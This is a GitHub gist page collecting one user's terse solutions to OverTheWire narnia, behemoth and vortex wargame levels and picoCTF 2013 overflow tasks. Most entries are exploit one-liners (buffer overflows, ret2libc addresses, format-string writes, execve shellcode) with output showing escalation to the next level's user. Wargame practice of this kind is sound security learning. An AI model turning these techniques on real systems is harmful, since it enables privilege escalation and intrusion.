Paulus Gandung Prakosa plvhx

🏠

Working from home

unknown wanderer from Mars. :)))

161 followers · 238 following

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

plvhx / README.md

Last active December 22, 2016 12:52

overthewire.org narnia level4

... Because i'm lazy to guess which 'esp' addr i must occupy... even NX shit disabled... i resist to use ret2libc...

narnia4@melinda:/narnia$ ./narnia4 $(python -c 'from struct import *;print "\x41"*(256 + 16) + pack("<I", 0xf7e61e70) + pack("<I", 0xf7e54f50) + pack("<I", 0xf7f7fa8c)')
$ id
uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14005(narnia5),14004(narnia4)
$ cat /etc/narnia_pass/narnia5
*********

plvhx / README.md

Created September 19, 2016 00:11

overthewire.org narnia level5

narnia5@melinda:/narnia$ ./narnia5 $(python -c 'print "\xdc\xd5\xff\xff"')'%496u%5$hn'
Change i's value from 1 -> 500. GOOD
$ cat /etc/narnia_pass/narnia6
**********
$

plvhx / README.md

Created September 19, 2016 02:12

overthewire narnia level6

narnia6@melinda:/narnia$ ./narnia6 $(python -c 'print "\x41"*(8) + "\x70\x1e\xe6\xf7"') $(python -c 'print "\x41"*(8) + "/bin/sh"')
$ id
uid=14006(narnia6) gid=14006(narnia6) euid=14007(narnia7) groups=14007(narnia7),14006(narnia6)
$ cat /etc/narnia_pass/narnia7
********

plvhx / README.md

Created September 19, 2016 02:33

overthewire.org narnia level7

narnia7@melinda:/narnia$ ./narnia7 $(python -c 'print "\x2c\xd5\xff\xff\x2e\xd5\xff\xff"')'%34558x%6$hn%33022x%7$hn'
goodfunction() = 0x80486e0
hackedfunction() = 0x8048706

before : ptrf() = 0x80486e0 (0xffffd52c)
I guess you want to come to the hackedfunction...
Way to go!!!!$ ls
narnia0    narnia1    narnia2	 narnia3    narnia4    narnia5	  narnia6    narnia7	narnia8
narnia0.c narnia1.c narnia2.c narnia3.c narnia4.c narnia5.c narnia6.c narnia7.c	narnia8.c

plvhx / README.md

Created September 19, 2016 12:09

overthewire.org behemoth level1

(python -c 'from struct import pack;print "\x41"*(67 + 12) + pack("<I", 0xf7e61e70) + pack("<I", 0xf7e54f50) + pack("<I", 0xf7f7fa8c)' 2> /dev/null; tee) | ./behemoth1

plvhx / README.md

Created September 21, 2016 02:24

overthewire.org vortex level1

vortex1@melinda:/vortex$ (python -c 'print "\\"*(257 + 4) + "\xca"'; tee) | ./vortex1
[ ... some useless garbage... ]
ls
id
uid=5002(vortex2) gid=5001(vortex1) groups=5002(vortex2),5001(vortex1)

plvhx / README.md

Last active December 22, 2016 12:50

overthewire.org vortex level2

Hint: $$ in bash is current PID :v :v

vortex2@melinda:/vortex$ mkdir /tmp/.v0
vortex2@melinda:/vortex$ ./vortex2 /etc/vortex_pass/vortex3
/bin/tar: Removing leading `/' from member names
vortex2@melinda:/vortex$ cp '/tmp/ownership.$$.tar' /tmp/.v0/.
vortex2@melinda:/vortex$ cd /tmp/.v0
vortex2@melinda:/tmp/.v0$ ls
ownership.$$.tar

plvhx / README.md

Last active December 22, 2016 12:50

overthewire.org vortex level3

vortex3@melinda:/vortex$ ./vortex3 $(python -c 'import struct;Q = lambda x: struct.pack("<I", x);print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" + "\x90"*(106) + Q(0x8049312)')
$ id
uid=5003(vortex3) gid=5003(vortex3) euid=5004(vortex4) groups=5004(vortex4),5003(vortex3)
$

plvhx / README.md

Created September 21, 2016 12:39

picoCTF 2013 overflow-1 re-writeup

./overflow1-3948d17028101c40 $(python -c 'import struct;print "\x41"*(0x40) + struct.pack("<I", 1)')

plvhx / README.md

Created September 21, 2016 12:48

picoCTF 2013 overflow-2 re-writeup

./overflow2-44e63640e033ff2b $(python -c 'import struct;print "\x41"*(0x40 + 16) + struct.pack("<I", 0x01)')

Older Newer